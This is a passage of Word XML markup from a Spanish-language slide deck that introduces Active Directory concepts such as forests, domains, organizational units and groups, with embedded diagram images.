          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servidor Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66150A2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3263"/>
        </w:tabs>
        <w:spacing w:before="333"/>
        <w:ind w:left="3263" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ciudad del equipo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503437F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3263"/>
        </w:tabs>
        <w:spacing w:before="333"/>
        <w:ind w:left="3263" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bambú</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52D8FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="840" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5B43D7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1703"/>
        </w:tabs>
        <w:spacing w:before="335"/>
        <w:ind w:left="1703" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Active Directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07467889" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2423"/>
        </w:tabs>
        <w:spacing w:before="566"/>
        <w:ind w:left="2423" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Como su nombre indica, es un directorio (o base de datos) que </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AC2B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3143"/>
        </w:tabs>
        <w:spacing w:before="576"/>
        <w:ind w:left="3143" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Administra los recursos de la organización como (usuarios, computadoras, recursos compartidos, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275BA624" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3143"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="3143" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Proporciona reglas de acceso que rigen las relaciones entre estos recursos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02018282" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3143"/>
        </w:tabs>
        <w:spacing w:before="44"/>
        <w:ind w:left="3143" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Almacena información sobre los objetos de la red y la pone a disposición de los usuarios y administradores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF85706" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682F3195" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758E1F01" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="251"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68486F8F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2423"/>
        </w:tabs>
        <w:ind w:left="2423" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Proporciona una gestión centralizada de todos los activos virtuales de la organización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECA714"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399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD273D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="1761"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FBFC442" wp14:editId="6AD8E0A8">
                <wp:extent cx="9941560" cy="6407785"/>
                <wp:effectExtent l="0" t="0" r="0" b="2539"/>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41560" cy="6407785"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9941560" cy="6407785"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="115" name="Image 115"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId55" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="9941143" cy="6407217"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="116" name="Image 116"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId56" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164637" y="131231"/>
                            <a:ext cx="9625584" cy="6124956"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="3DDD00E0" id="Group 114" o:spid="_x0000_s1026" style="width:782.8pt;height:504.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="99415,6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">
                <v:shape id="Image 115" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:99411;height:6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">
                  <v:imagedata r:id="rId57" o:title=""/>
                </v:shape>
                <v:shape id="Image 116" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1312;width:96256;height:6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">
                  <v:imagedata r:id="rId58" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B30D8C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId59"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="40" w:right="0" w:bottom="600" w:left="0" w:header="0" w:footer="401" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1B72CD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1050"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="1050" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bosques/dominio de Active Directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FEC20" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1770"/>
        </w:tabs>
        <w:spacing w:before="652"/>
        <w:ind w:left="1770" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Forest </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>es una instancia única de Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E276AB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2490"/>
        </w:tabs>
        <w:spacing w:before="43"/>
        <w:ind w:left="2490" w:hanging="359"/>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5334016" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D2F79B8" wp14:editId="415D3A45">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7662671</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187781</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4529455" cy="505714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5057140"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4529455" cy="5057140"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="118" name="Image 118" descr="Root Domains and DNS Namespaces"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId60" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4529328" cy="5056632"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="119" name="Image 119" descr="Root Domains and DNS Namespaces"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId61" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="195071" y="195040"/>
                            <a:ext cx="3986784" cy="4486656"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5B6E244D" id="Group 117" o:spid="_x0000_s1026" style="position:absolute;margin-left:603.35pt;margin-top:14.8pt;width:356.65pt;height:398.2pt;z-index:-17982464;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="45294,5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">
                <v:shape id="Image 118" o:spid="_x0000_s1027" type="#_x0000_t75" alt="Root Domains and DNS Namespaces" style="position:absolute;width:45293;height:5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">
                  <v:imagedata r:id="rId62" o:title="Root Domains and DNS Namespaces"/>
                </v:shape>
                <v:shape id="Image 119" o:spid="_x0000_s1028" type="#_x0000_t75" alt="Root Domains and DNS Namespaces" style="position:absolute;left:1950;top:1950;width:39868;height:4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">
                  <v:imagedata r:id="rId63" o:title="Root Domains and DNS Namespaces"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Es básicamente una colección de controladores de dominio que confían entre sí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EF5F4E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4727FD5D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642FC44E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1770"/>
          <w:tab w:val="left" w:pos="1841"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:right="7865" w:hanging="430"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Los dominios </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>se pueden considerar como contenedores dentro del ámbito de un bosque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178AD747" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="27"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44718AB2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1733"/>
          <w:tab w:val="left" w:pos="1770"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="254" w:lineRule="auto"/>
        <w:ind w:left="1733" w:right="7614" w:hanging="322"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Las unidades organizativas (OU) </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>son agrupaciones lógicas de usuarios, equipos y otros recursos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2A894" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="27"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6A0E68" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1770"/>
        </w:tabs>
        <w:ind w:left="1770" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Grupos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB7810C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2490"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2490" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Colección de usuarios u otros grupos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE9E52" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2490"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2490" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Privilegiados, no privilegiados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C9E75" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:spacing w:before="812"/>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49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07D349" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId64"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="380" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4156D6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1238"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="1238" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Objetos de Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD15E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="154"/>
        <w:rPr>
